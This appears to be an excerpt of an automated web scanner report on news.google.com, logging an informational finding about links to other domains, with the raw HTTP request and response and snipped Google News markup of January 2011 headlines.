<span><a target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGclM7GNS2RlRwDlY-I5Sh_tvXrlA " href="http://www.latimes.com/news/nationworld/nation/la-na-jared-loughner-20110125,0,2181209.story" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg " title="Portfolio.com"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/9nA0qAvPpJ5tCM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.portfolio.com/business-news/reuters/2011/01/25/stock-index-futures-down-earnings-eyed" class="usg-AFQjCNFszoLxoWot30YUefNdyfEGE4kIHg "> Portfolio.c... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF2jLGtCargCIeSkIo7qnfEjTTITg " href="http://www.marketwatch.com/story/us-stock-futures-hold-losses-after-housing-data-2011-01-25" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704698004576103613884707694.html" target="_blank" class="usg-AFQjCNH63dxEzu3MUjCj-H7fBq6jy9-OXg " id="MAA4AEgVUAFgAmoCdXM">Futures Slip On Earnings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.foxnews.com/us/2011/01/25/earnings-decide-dow-breaks/" target="_blank" class="usg-AFQjCNEBWRfEEp_6PdxYPJ5HwDtXamG8ZQ " id="MAA4AEgVUAJgAmoCdXM">Earnings will decide if Dow breaks 12000</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEcBCxBebysAaamuuqoGdU6r2WTlQ " href="http://www.thestreet.com/story/10983901/1/stock-futures-jan-25.html?cm_ven=GOOGLEN" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQ6-PRUCNN72J9NA3j8YhrRK9cag " href="http://money.cnn.com/2011/01/25/markets/premarkets/" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF1V9J-cnX-p6mS5xywLk2umDsG7w " href="http://www.foxbusiness.com/markets/2011/01/24/futures-hint-mini-pullback/" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHn26B9FGrLg4s4yok5aUh5NlOiQg " href="http://www.sltrib.com/sltrib/money/51114328-79/dow-percent-shares-12000.html.csp" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164" class="usg-AFQjCNFh7oZXmYPsrkHidNIVJIVXCMrg9g " title="WIVB"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/aX1Xki1PujqpGM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.wivb.com/dpps/news/nation/west/ore-town-in-fear-as-police-seek-shooting-suspect-nt11-jgr_3704164" class="usg-AFQjCNFh7oZXmYPsrkHidNIVJIVXCMrg9g "> WIVB </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHjH1z5wN7WOzviGRO9bpMAi351Fg " href="http://www.seattlepi.com/local/6420ap_or_oregon_officer_shot.html" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012401933.html" target="_blank" class="usg-AFQjCNECWBY8E7oDMRNhDFvDT5-cxhhiQw " id="MAA4AEgWUAFgAmoCdXM">Police name suspect in shooting of Ore. officer</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.katu.com/news/local/114534899.html" target="_blank" class="usg-AFQjCNH8vXNZ49ZhukURxkch28NhnOq1xA " id="MAA4AEgWUAJgAmoCdXM">Manhunt continues; police keep watchful eye on suspect&#39;s home</a>
...[SNIP]...

20.108. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38
The response contains the following links to other domains:
  • http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf
  • http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
  • http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html
  • http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012403521.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html
  • http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years
  • http://www.wired.com/epicenter/2011/01/times-paywall/
  • http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/
  • http://www.wired.com/threatlevel/2011/01/twitter/
  • http://www.youtube.com/?hl=en&tab=n1
  • http://www.youtube.com/watch?v=1wbQ-zmLKqg
  • http://www.youtube.com/watch?v=3AGVHcnCKws
  • http://www.youtube.com/watch?v=3i4eR4POFOw
  • http://www.youtube.com/watch?v=6_dUkNdoPZI
  • http://www.youtube.com/watch?v=90gldve1V1g
  • http://www.youtube.com/watch?v=A1JzTAhSoKA
  • http://www.youtube.com/watch?v=Ay5CfV-_438
  • http://www.youtube.com/watch?v=Dye1RPvkcB0
  • http://www.youtube.com/watch?v=Id_W6wgEIGo
  • http://www.youtube.com/watch?v=QMHmzs0RsUA
  • http://www.youtube.com/watch?v=THO8bb8v_Xs
  • http://www.youtube.com/watch?v=_XOgAa7BN-o
  • http://www.youtube.com/watch?v=pUzMhGLMFgQ
  • http://www.youtube.com/watch?v=uwXNpYAgahg
  • http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
  • http://www.zeenews.com/news682964.html

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddMP3JjJDFIJRJIMQcYiNzx8PKdjKM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d11\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQqgIwCg\\x22\\x3e38 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=KeBkS__L7_ClmcKCW7gO0KfUoYJpHymMOVOeAjRucfip_cRbzBjhNrlZrc1l7bepVochNO7kSbejYUiayim5SZhtIY80UDyegBGckxpJbdJjfbHxy75KNkBtqUxo6bB_;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:12 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:12 GMT
Expires: Mon, 24 Jan 2011 22:43:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7GHQ7EiaH4U94pZ0LQb_hOwaJjA " href="http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF8KU8lwacw5bgjcA_PplD4ky7CcA " href="http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEoA064sb9NXd1pqBHc47dzM2oIJw " href="http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgMUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgMUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgNUAFgAmoCdXM">Lowering BP Can Help Cut Women&#39;s Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgNUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgNUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&amp;srvc=rss" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgOUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgOUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgOUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&amp;id=1163&amp;line=199317&amp;spln=1" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgPUAFgAmoCdXM">Twitter&#39;s Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgPUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgPUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/E4wG-9FiV5eTAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video:&nbsp;
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgQUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgQUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhneFPmAPUa6G6iZ-Yzxn3ptkaaw " href="http://www.jsonline.com/news/milwaukee/114509574.html" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/nDfXuLMkVhCuOM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEW9WCHK4yVIzY7YU49PFGPQMbJVA " href="http://www.nytimes.com/2011/01/25/world/middleeast/25israel.html" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3AGVHcnCKws">Video:&nbsp;
Hezbollah wants national unity government
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/hezbollah-backed-candidate-lebanon-pm" target="_blank" class="usg-AFQjCNFd_sxRNnRB9acSagaGcnxPwcjqNQ " id="MAA4AEgRUAFgAmoCdXM">Hezbollah-backed candidate poised to become Lebanon PM</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGoa-0SZT-HgUkHELYIm4Qlt5QmCQ " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_2" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4eXowgPSlua1VqG8Nf0LMONQahQ " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12267758" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/PTWrrKWFPhkNhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&amp;campaign=rss&amp;source=NFLHeadlines" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " id="MAA4AEgSUAFgAmoCdXM">Rex Ryan: Jets have &#39;done a pretty good job&#39; of beating Patriots</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHfEBCN-dtPvPOTD0kDPV0P8d3Q1Q " href="http://online.wsj.com/article/APa59ba6dc9ce0453e8a616202c7484b68.html" id="MAA4AEgSUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLYIutFWp_mZm9Ukmjx0jnqY1qmQ " href="http://www.ajc.com/sports/jets-qb-sanchez-optimistic-814203.html" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video:&nbsp;
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgTUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgTUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ " title="Computerworld"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ "> Computerwor... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHN9PKHYEKTa2KbqrEgQddEwTWgIw " href="http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
